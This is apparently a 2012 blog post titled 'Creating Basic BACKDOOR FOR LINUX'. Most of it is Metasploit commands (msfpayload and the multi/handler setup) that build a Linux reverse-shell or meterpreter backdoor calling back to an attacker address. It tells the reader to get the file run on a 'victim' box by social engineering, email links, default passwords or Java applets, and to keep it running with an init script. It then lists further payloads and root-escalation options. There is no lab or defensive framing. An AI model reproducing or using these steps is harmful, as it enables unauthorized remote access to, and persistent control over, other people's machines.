Wednesday, May 2, 2012

Creating Basic BACKDOOR FOR LINUX





msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/backdoor_44


#msfconsole

msf > use multi/handler
msf  exploit(handler) > set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
msf  exploit(handler) > setg LHOST 192.168.1.4
LHOST => 192.168.1.4
msf  exploit(handler) > setg LPORT 4444
LPORT => 4444
msf  exploit(handler) > exploit

Now you need to run any how backdoor_44 on victim linux box

through java applet remote link
through social engeering
default passwd of linux box
through email sending Link
through javascript
any how you need to execute a backdoor_44 on victim box and create init script to run backdoor_44
on victim box
any how


go for maore payloads
payload/linux/x86/adduser
payload/linux/x86/chmod
payload/linux/x86/exec
payload/linux/x86/meterpreter/bind_ipv6_tcp
payload/linux/x86/meterpreter/bind_tcp
payload/linux/x86/meterpreter/find_tag
payload/linux/x86/meterpreter/reverse_ipv6_tcp
payload/linux/x86/meterpreter/reverse_tcp
payload/linux/x86/metsvc_bind_tcp
payload/linux/x86/shell/bind_ipv6_tcp



or



$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/linux/x86/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp) > generate

or

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/backdoor_44

Module Options

DebugOptions Debugging options for POSIX meterpreter (default: 0)
LHOST The listen address
LPORT The listen port (default: 4444)
PrependFork Add a fork() / exit_group() (for parent) code
AppendExit Append a stub that executes the exit(0) system call
AutoLoadStdapi Automatically load the Stdapi extension
AutoRunScript A script to run automatically on session creation.
AutoSystemInfo Automatically capture system information on initialization.
EnableUnicodeEncoding Automatically encode UTF-8 strings as hexadecimal
InitialAutoRunScript An initial script to run on session creation (before AutoRunScript)
PrependChrootBreak Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependSetresuid Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid Prepend a stub that executes the setuid(0) system call
ReverseConnectRetries The number of connection attempts to try before exiting the process
ReverseListenerBindAddress The specific IP address to bind to on the local system
ReverseListenerComm The specific communication channel to use for this listener
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module




No comments:

Post a Comment